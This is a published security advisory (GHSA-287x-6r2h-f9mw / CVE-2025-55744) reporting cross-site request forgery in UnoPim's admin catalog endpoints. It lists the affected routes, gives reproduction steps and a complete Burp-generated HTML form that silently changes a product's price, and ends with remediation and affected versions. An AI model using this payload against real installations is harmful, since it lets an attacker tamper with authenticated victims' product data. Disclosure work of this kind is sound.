GHSA-287x-6r2h-f9mw

Source

https://github.com/advisories/GHSA-287x-6r2h-f9mw

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-287x-6r2h-f9mw/GHSA-287x-6r2h-f9mw.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-287x-6r2h-f9mw

Aliases

CVE-2025-55744

Published

2025-08-21T14:27:18Z

Modified

2025-08-21T19:47:01.863552Z

Severity

6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator

Summary

UnoPim vulnerable to CSRF on Product edit feature and creation of other types

Details

Summary

Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). | Method | Endpoint | Status | Reason | |:------:|:------:|:------:|:------:| | POST | /admin/catalog/products/create | Not Vulnerable :whitecheckmark: | X-XSRF-TOKEN header used | | GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection | | POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection | | POST | /admin/settings/users/create | Not Vulnerable :whitecheckmark: | X-XSRF-TOKEN header used |

The below are some of the vulnerable endpoints that allow state changing actions including but not limited to:

/admin/catalog/categories/create
/admin/catalog/categories/edit/{id}
/admin/catalog/category-fields/create
/admin/catalog/category-fields/edit/{id}
/admin/catalog/attributes/create
/admin/catalog/attributes/edit/{id}

Details

CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim. In this case, the POST request doesn't need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either application/x-www-form-urlencoded or multipart/form-data so we can say this is a Simple request ( doesn't need preflight request ). The cookies are send because samesite is set to None. We have every ingredients for a successful CSRF attack.

PoC

1. Go to any product and click on Edit.
2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )
3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.

POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

csrf-poc.html:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8000/admin/catalog/products/edit/7" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="&#95;token" value="s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5" />
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="sku" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="channel" value="default" />
      <input type="hidden" name="locale" value="en&#95;US" />
      <input type="hidden" name="values&#91;common&#93;&#91;sku&#93;" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;sku&#93;" value="values&#91;common&#93;&#91;sku&#93;" />
      <input type="hidden" name="values&#91;common&#93;&#91;product&#95;number&#93;" value="" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;product&#95;number&#93;" value="values&#91;common&#93;&#91;product&#95;number&#93;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;name&#93;" value="test" />
      <input type="hidden" name="values&#91;common&#93;&#91;url&#95;key&#93;" value="fffkk" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;url&#95;key&#93;" value="values&#91;common&#93;&#91;url&#95;key&#93;" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;short&#95;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;title&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;keywords&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;description&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;price&#93;&#91;USD&#93;" value="7&#46;777" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;cost&#93;&#91;USD&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="false" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

Attacker can perform action on behalf of the victim as this happens on the victim's browser provide the victim is already authenticated to the application. Attacker can use an image tag to send the GET request such that when the page is loaded, it'll get executed. As shown in the video POC, the product information can be tampered, create new categories etc.

Remediation:

Use CSRF token for every state changing request.
Use samesite: lax or strict, now it is set 'None'. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.

Database specific

{
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:27:18Z",
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "cwe_ids": [
        "CWE-352"
    ]
}

References

Affected packages

Packagist / unopim/unopim

Package

Name: unopim/unopim
Purl: pkg:composer/unopim/unopim

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.2.1

Affected versions

v0.*

v0.1.0

v0.1.1

v0.1.2

v0.1.3

v0.1.4

v0.1.5

v0.1.6

v0.2.0

Database specific

{
    "last_known_affected_version_range": "<= 0.2.0"
}